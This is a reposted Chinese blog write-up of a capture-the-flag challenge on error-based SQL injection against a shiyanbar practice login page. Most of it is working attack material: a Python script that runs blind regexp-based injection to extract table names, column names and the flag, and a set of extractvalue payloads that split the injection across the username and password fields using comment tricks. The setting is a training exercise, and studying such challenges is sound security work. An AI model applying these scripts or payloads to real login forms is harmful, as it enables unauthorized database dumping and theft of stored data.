zoukankan html css js c++ java

加了料的报错注入

实验吧：加了料的报错注入

题目：http://www.shiyanbar.com/ctf/2011

法1：
# *-* encoding=utf-8 *-*

import string
import requests

url = 'http://ctf5.shiyanbar.com/web/baocuo/index.php'

mys = requests.session()
true_state = 'You are our member, welcome to enter'
#爆表名
# model ="1' or !(length((select group_concat(table_name) from information_schema.tables where !(table_schema<>database())))<>%d) or '"
#注意此处的括号比较多，容易写多了
# lens_table = 0
# i = 0
#
# while True:
#     tmp = model % i
#     data = {
#         'username': 1,
#         'password': tmp
#     }
#
#     res = mys.post(url, data=data).content
#     if true_state in res:
#         lens_table = i
#         break
#     i += 1
#
# print '表长度为： ' + lens_table
#lens_table = 14

# charset = string.digits + string.lowercase + '!_{}@~.'
# strs_table = ''
# model = "0' or (select group_concat(table_name) from information_schema.tables where !(table_schema<>database())) regexp '^%s' or '"
#
# for i in range(lens_table):
#     for ch in charset:
#         tmp = model % (strs_table + ch)
#         data = {
#             'username': 1,
#             'password': tmp
#         }
#         res = mys.post(url, data=data).content
#         if true_state in res:
#             strs_table += ch
#             print 'regexp: ' + strs_table
#             break
#     pass
# pass
#
# print '表名为： ' + strs_table
#print 'ffll44jj,users'
#strs_table = 'ffll44jj'


#爆列名
#model ="1' or !(length((select group_concat(column_name) from information_schema.columns where !(table_name<>'ffll44jj')))<>%d) or '"
#注意此处的括号比较多，容易写多了
# lens_column = 0
# i = 0
#
# while True:
#     tmp = model % i
#     data = {
#         'username': 1,
#         'password': tmp
#     }
#
#     res = mys.post(url, data=data).content
#     if true_state in res:
#         lens_column = i
#         break
#     i += 1
#
# print lens_column
# #lens_column = 14
#
# charset = string.digits + string.lowercase + '!_{}@~.'
# strs_column = ''
# model = "1' or (select group_concat(column_name) from information_schema.columns where !(table_name<>'ffll44jj')) regexp '^%s' or '"
#
# for i in range(lens_column):
#     for ch in charset:
#         tmp = model % (strs_column + ch)
#         data = {
#             'username': 1,
#             'password': tmp
#         }
#         res = mys.post(url, data=data).content
#         if true_state in res:
#             strs_column += ch
#             print 'regexp: ' + strs_column
#             break
#     pass
# pass
#
# print '表名为： ' + strs_column
#
# print 'value'
#
# strs_column = 'value'

#爆flag
model ="1' or !(length((select group_concat(value) from ffll44jj))<>%d) or '"
#注意此处的括号比较多，容易写多了
lens_flag = 0
i = 0

while True:
    tmp = model % i
    data = {
        'username': 1,
        'password': tmp
    }

    res = mys.post(url, data=data).content
    if true_state in res:
        lens_flag = i
        break
    i += 1

print lens_flag
#lens_flag = 14

charset = string.digits + string.lowercase + ',!_{}@~.'
#该处的字符集尽量避免正则表达式中的特殊符号+ * ?等，因为+等表示前面的字符可出现多次，即使匹配到了，也不会在有效，
#比如本题中，flag中有一个+号，第一次是匹配到了，但在下一个字符匹配中，他会被当做正则中的+号处理，要求至少出现两次，
#从而后面的可能就匹配不上了。所以建议用.点号表示任意字符的匹配，匹配到.点时，用正则中的特殊字符替换，可能花一些时间。
flag = ''
model = "1' or (select group_concat(value) from ffll44jj) regexp '^%s' or '"

for i in range(lens_flag):
    for ch in charset:
        tmp = model % (flag + ch)
        data = {
            'username': 1,
            'password': tmp
        }
        res = mys.post(url, data=data).content
        if true_state in res:
            flag += ch
            print 'regexp: ' + flag
            break
    pass
pass

print 'flag为： ' + flag
print 'flag{err0r_b4sed_sqli_+_hpf}'

法2：
username=1' or extractvalue/*&password=*/(1,concat(0x23,database())) or '
username=1' or extractvalue/*&password=*/(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema regexp database()))) or '
username=1' or extractvalue/*&password=*/(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj'))) or '
username=1' or extractvalue/*&password=*/(1,concat(0x23,(select value from ffll44jj))) or '

13:01:07

查看全文

相关阅读:
svn git 共存
 如何写软件设计文档
 spring boot requestbody string to date
asp.net core 1.1 publish to a linux
asp.net core 1.1 entityframework mysql
[FPGA]記錄一些不錯的網站推薦給大家參考。
[FPGA][DE0] Qsys 加入 FLASH 記憶體方法及步驟
 [FPGA][Nios][DP83848] 網路開發筆記-軟體篇(1)
[Nios][UART] 使用UART 的一些問題?
[Nios][Eclipse] find_fast_cwd: WARNING: Couldn't compute FAST_CWD pointer

原文地址：https://www.cnblogs.com/gwind/p/8004886.html